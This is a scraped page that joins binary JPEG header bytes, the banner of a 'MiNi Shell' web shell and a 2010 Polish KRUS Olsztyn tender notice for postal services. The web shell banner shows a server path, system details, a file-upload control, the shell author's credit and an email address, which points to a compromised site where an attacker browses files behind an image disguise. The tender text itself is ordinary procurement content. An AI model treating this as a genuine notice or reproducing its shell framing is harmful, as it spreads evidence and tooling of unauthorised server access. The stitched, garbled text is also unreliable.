JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101126/338759-N-2010.html

<p class="kh_header"><b>Olsztyn: Świadczenie  usług pocztowych dla przesyłek o wadze powyżej 50g dla OR KRUS w Olsztynie oraz podległych Placówek Terenowych</b><br>
<b>Numer ogłoszenia: 338759 - 2010; data zamieszczenia: 26.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Olsztynie , ul. Mickiewicza 1, 10-959 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5349771, faks 089 523 67 59.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie  usług pocztowych dla przesyłek o wadze powyżej 50g dla OR KRUS w Olsztynie oraz podległych Placówek Terenowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Przedmiotem zamówienia jest świadczenie  usług pocztowych dla przesyłek o wadze powyżej 50g dla OR KRUS w Olsztynie oraz podległych Placówek Terenowych (wykaz wszystkich Placówek Terenowych określa Załącznik Nr 6 do niniejszej SIWZ), a w szczególności:
1)	w obrocie krajowym i zagranicznym ekonomicznych i priorytetowych:
a)	przesyłek listowych nierejestrowanych,
b)	przesyłek listowych rejestrowanych,
c)	paczek pocztowych,
2)	przesyłek kurierskich w obrocie krajowym, w tym nadchodzących do Zamawiającego z opłatą przerzuconą na adresata 
3)	płatnej usługi odbioru przesyłek do nadania z siedziby Zamawiającego.

2. Usługi pocztowe stanowiące przedmiot zamówienia obejmują w szczególności:
1)	przesyłki o wagach: 
a. 51 - 100 gram gabaryt (A i B)*,
b. 101 - 350 gram gabaryt (A i B)*,
c. 351 - 500 gram gabaryt (A i B)*,
d. 501 - 1000 gram gabaryt (A i B)*,
e. 1001 - 2000 gram gabaryt (A i B)*,
* Gabaryt A to przesyłki o wymiarach:
Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm,
Maksimum - żaden z wymiarów nie może przekraczać: wysokość 20 mm,
długość 325 mm, szerokość 230 mm.
*Gabaryt B to przesyłki o wymiarach:
Minimum - jeżeli choć jeden z wymiarów przekracza wartość określoną jako
maksimum w gabarycie A.
Maksimum - suma długości, szerokości i wysokości nie przekracza 900 mm,
przy czym długość nie może przekroczyć 600 mm.
       2) paczki o wagach:
a. do 1 kg gabaryt (A i B)*,
b. ponad 1 - 2 kg gabaryt (A i B)*,
c. ponad 2 - 5 kg gabaryt (A i B)*,
d. ponad 5 - 10 kg gabaryt (A i B)*,
  * Gabaryt A to paczki o wymiarach:
Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm,
Maksimum - żaden z wymiarów nie może przekroczyć: długość 600 mm,
szerokość 500 mm, wysokość 300 mm.
   *Gabaryt B to paczki o wymiarach:
Minimum - jeżeli choć jeden z wymiarów przekracza wartość określoną jako
maksimum w gabarycie A.
Maksimum - suma długości i i największego obwodu mierzonego w innym
kierunku niż długość - 3000 przy czym największy wymiar nie może
                        przekroczyć 1500 mm.

 3.  Przyjmowanie, przemieszczanie i doręczanie przesyłek wykonywane będzie zgodnie
      z przepisami:
1)	Ustawa z dnia 12 czerwca 2003 r. Prawo Pocztowe tekst jednolity (Dz. U. Nr 189 z 2008 roku  poz. 1159, z późn. zm.),
2)	Rozporządzenie Ministra Infrastruktury z dnia 9 stycznia 2004 r. w sprawie warunków wy-konywania powszechnych usług pocztowych, (Dz. U. Nr 5 poz. 34, z późn. zm.),
3)	przepisy regulujące przedmiot zamówienia w pocztowym obrocie międzynarodowym
4)	przepisy szczególne regulujące przedmiot zamówienia przez Wykonawcę i powszechnie 
        obowiązujące.

4.   Zamawiający zobowiązuje się  do wykonywania czynności polegających na:
1)	nadawaniu przesyłek w wyznaczonej placówce Wykonawcy wskazanej w załączniku nr 1 do umowy,
2)	odbieraniu przesyłek rejestrowanych zwracanych do Zamawiającego po wyczerpaniu możliwości ich doręczenia/wydania odbiorcy,
3)	adresowaniu, oznakowaniu i opakowaniu przesyłek listowych (z wyłączeniem przesyłek listowych z zadeklarowaną wartością) zgodnie z wymaganiami określonymi w załączniku nr 3 do umowy,
4)	wypełnieniu przeznaczonych dla Zamawiającego części w formularzach adresowych,
5)	umieszczeniu oznaczenia potwierdzającego wniesienie opłaty za usługę w postaci napisu, nadruku lub odcisku pieczęci o treści wg wzoru stosowanego przez Wykonawcę:                                                                                                                                                                                                         
a)	w miejscu przeznaczonym na znak opłaty pocztowej, na stronie adresowej przesyłek listowych (z wyłączeniem przesyłek listowych z zadeklarowaną wartością w obrocie krajowym),
b)	w górnym prawym rogu na stronie adresowej paczek pocztowych - w przypadku korzystania przez Zamawiającego z nalepek adresowych nakładu Wykonawcy. 
Dodatkowo na nalepce adresowej w polu Opłata Zamawiający umieszcza napis Opłata pobrana - Umowa ,
c)	we wskazanym przez Wykonawcę miejscu na nalepce adresowej dla paczek pocztowych - jeżeli Zamawiający uzyska zgodę na stosowanie nalepek adresowych własnego nakładu,
6)	umieszczeniu na nalepce adresowej do przesyłek listowych z zadeklarowaną wartością 
w obrocie krajowym i przesyłek kurierskich informacji o wniesieniu opłaty za przesyłkę w polu Opłata napisu UMOWA Nr.... z dnia ..............2010r.,
7)	nadawaniu przesyłek, których zawartość stanowią wyłącznie materiały własne oraz nie załą-czaniu do przesyłek żadnych materiałów pochodzących od osób trzecich, a w szczególności reklamowych, informacyjnych, promocyjnych i innych,
8)	sporządzaniu w dwóch egzemplarzach, zaopatrzonych w informacje o Zamawiającym, formie opłaty, numerze i dacie zawartej umowy, z których oryginał przeznaczony jest dla placówki nadawczej Wykonawcy:
a)	pocztowej książki nadawczej - dla przesyłek rejestrowanych, wpisując każdą przesyłkę kolejno w oddzielną pozycję czytelnie, zgodnie z określeniem kolumn, zaznaczając w kolumnie uwagi:
-	usługi komplementarne (np. P.O. - dla przesyłek z potwierdzeniem odbioru), 
-	kategorię przesyłki w przypadku przesyłek priorytetowych - używając skrótu PR,
-	gabaryt w przypadku przesyłek w gabarycie B używając skrótu B, 
b)	zestawienia zgodnego ze wzorem stanowiącym załącznik nr 4 do umowy - dla przesyłek nierejestrowanych. 
W przypadku dokonania błędnego wpisu i jego poprawienia bądź wykreślenia, Zamawiający poświadcza ten fakt składając obok swój podpis,
9)	nadawaniu przesyłek w stanie uporządkowanym tj. przekazaniu przesyłek ułożonych stroną adresową w tym samym kierunku:  
a)	rejestrowanych - według kolejności wpisów w pocztowej książce nadawczej, dokonywanych z uwzględnieniem podziału na: poszczególne rodzaje usług, przesyłki krajowe i zagraniczne, ekonomiczne i priorytetowe, 
            b)   nierejestrowanych - w podziale wynikającym z zestawienia, o którym mowa w pkt 8)
                  ppkt b).
5.	Ilości poszczególnych usług określone w Załączniku Nr 2 do niniejszej SIWZ  mają charakter 
szacunkowy i mogą ulec zmniejszeniu w trakcie realizacji umowy w zależności od potrzeb Zamawiającego, na co Wykonawca wyraża zgodę oraz oświadcza, że nie będzie dochodzić roszczeń z tytułu takich zmian ilościowych w trakcie realizacji umowy.


6.	 Wykonawca zobowiązuje się, bez dodatkowych opłat, doręczać codziennie (oprócz sobót, niedziel i świąt) wyłącznie do siedziby Zamawiającego mieszczącej się przy ul. Mickiewicza 1, 10-959 Olsztyn w godzinach 7.15 - 8.00,  adresowane na adres  Zamawiającego przesyłki listowe ekonomiczne i priorytetowe (w tym przesyłki polecone za potwierdzeniem odbioru), zwane dalej przesyłkami.

7.	Przesyłki wymienione w pkt 5. doręczane będą przez Wykonawcę wraz ze Zbiorowym dowodem odbioru przesyłek z tego dnia, sporządzonym wg wzoru stanowiącego Załącznik Nr 6  wzoru umowy.

8.	Równocześnie z doręczaniem przesyłek Wykonawca przekazywał będzie Zamawiającemu potwierdzone dowody nadania jego przesyłek z poprzedniego dnia w ramach płatnej usługi odbioru korespondencji z siedziby Zamawiającego.


9.	Odbiór przesyłek kwitowany będzie na dokumencie Zbiorowego dowodu odbioru czytelnym podpisem osoby upoważnionej przez Zamawiającego do odbioru przesyłek oraz odciskiem jego stempla firmowego oraz datą odbioru

10.	Wykonawca zobowiązany jest do odbioru wyłącznie z siedziby Zamawiającego tj. ul. 
     Mickiewicza 1, 10-959 Olsztyn, jeden raz dziennie przesyłek przygotowanych do 
     wyekspediowania  od Zamawiającego: od poniedziałku do piątku w godz. 14.00-15.00, a 
     następnie nadaniu tych przesyłek na ogólnych zasadach,  w Placówce nadawczej Wykonawcy.

11. Pozostałe Placówki Terenowe wymienione w Załączniku nr 6  do SIWZ będą odbierały i 
      wysyłały przesyłki pocztowe w placówce  nadawczej Wykonawcy na terenie miasta na którym
      znajduje się dana Placówka Terenowa. 

12. Odbioru przesyłek będzie dokonywał upoważniony przedstawiciel Wykonawcy, po okazaniu 
     stosownego upoważnienia wystawionego przez Przedstawiciela Placówki nadawczej
     odbierającego przesyłki, wraz z dokumentem tożsamości. Odbiór przesyłek, przygotowanych do 
     wyekspediowania , będzie każdorazowo dokumentowany przez Wykonawcę pieczęcią,
     podpisem i datą w pocztowej książce  nadawczej ( dla przesyłek rejestrowych).

13. Zamawiający wymaga, aby usługa dostarczania przesyłek świadczona była do każdego
     wskazanego przez Zamawiającego adresu w Polsce i za granicami.

14. Druki potwierdzenia odbioru przesyłki będą zapewnione Wykonawcy wg wzoru dostarczonego
      przez Wykonawcę.

15. Nie wyszczególnione w Załączniku Nr 2 do SIWZ rodzaje przesyłek oraz zwroty do 
      Zamawiającego
     przesyłek rejestrowanych niedoręczonych z przyczyn niezależnych od Wykonawcy, będą
     wyceniane dodatkowo zgodnie z obowiązującym cennikiem Wykonawcy, który zostanie przez
     niego dostarczony najpóźniej w dniu podpisania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.11.20.00-4, 64.11.30.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie wyznzcza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	wykaz wykonanych lub wykonywanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich wartości, przedmiotu, daty i miejsca wykonywania, odbiorców oraz z załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane lub są wykonywane należycie - zgodnie ze wzorem stanowiącym Załącznik nr 7 do SIWZ. Na potwierdzenie niezbędnej wiedzy i doświadczenia Wykonawcy winni wykazać, ze w okresie trzech lat przed upływem składania ofert wykonali lub wykonują co najmniej dwie usługi o wartości minimum 30 000 PLN każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie wyznzcza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie wyznzcza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie wyznzcza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) oryginał pełnomocnictwa (pełnomocnictw), jeśli oferta nie jest podpisana przez osoby upoważnione do reprezentowania Wykonawcy lub gdy z innych wymaganych dokumentów nie wynika upoważnienie do reprezentowania
2) parafowany przez Wykonawcę formularz postanowień umowy - (wzór stanowi Załącznik Nr 5 do SIWZ),
3) podpisany formularz ofertowy sporządzony zgodnie ze wzorem - (wzór stanowi Załącznik Nr 1 do SIWZ), 
4) podpisany formularz cenowy sporządzony zgodnie ze wzorem - (wzór stanowi Załącznik Nr 2 do SIWZ),</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza możliwość zmiany postanowień umowy w zakresie:

    1) nazw i adresów Placówek Terenowych Zamawiającego oraz Wykonawcy, a także godzin odbioru i dostarczania przesyłek, jeżeli zmiany te będą wynikać ze zmian organizacyjnych w strukturze Zamawiającego lub Wykonawcy, w tym:
             a) zmiany danych Wykonawcy lub Zamawiającego bez zmiany samych stron umowy (zmiana    siedziby, adresu, nazwy, numeru rachunku bankowego, osób reprezentujących strony umowy ) w przypadku zaistnienia wymienionych wyżej zmian po danej stronie umowy,
            b) zmiany przedstawicieli reprezentujących Zamawiającego lub Wykonawcę podczas realizacji umowy w przypadkach: śmierci, choroby lub innych zdarzeń losowych wymienionych wyżej osób, jeżeli zmiana wymienionych wyżej osób okaże się konieczna z  jakichkolwiek innych przyczyn niezależnych od stron,
  2) wysokości opłat określonych w zestawieniu cen z formularza specyfikacji cenowej, w przypadku gdy zmiana nastąpi zgodnie z obowiązującymi w tym zakresie przepisami prawa, w szczególności ustawą Prawo pocztowe z dnia 12 czerwca 2003r. (dz. U. z 2008r., Nr 189, poz.1159 z późn. zm.) i wewnętrznymi uregulowaniami Wykonawcy. Wykonawca jest zobowiązany dostarczyć Zamawiającemu niezwłocznie nowy cennik.
  3) okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia - w takim przypadku umowa będzie mogła zostać dostosowana do zaistniałych okoliczności.
  4) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krus.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> KRUS Oddział Regionalny w Olsztynie, ul. Mickiewicza 1, 10-959 Olsztyn, w godzinach pracy urzędu, tj. od 7:15-15:15 we wszystkie dni robocze oraz na stronie internetowej www.krus.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2010 godzina 10:00, miejsce: KRUS Oddzial Regionalny w Olsztynie w pokoju nr 36.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com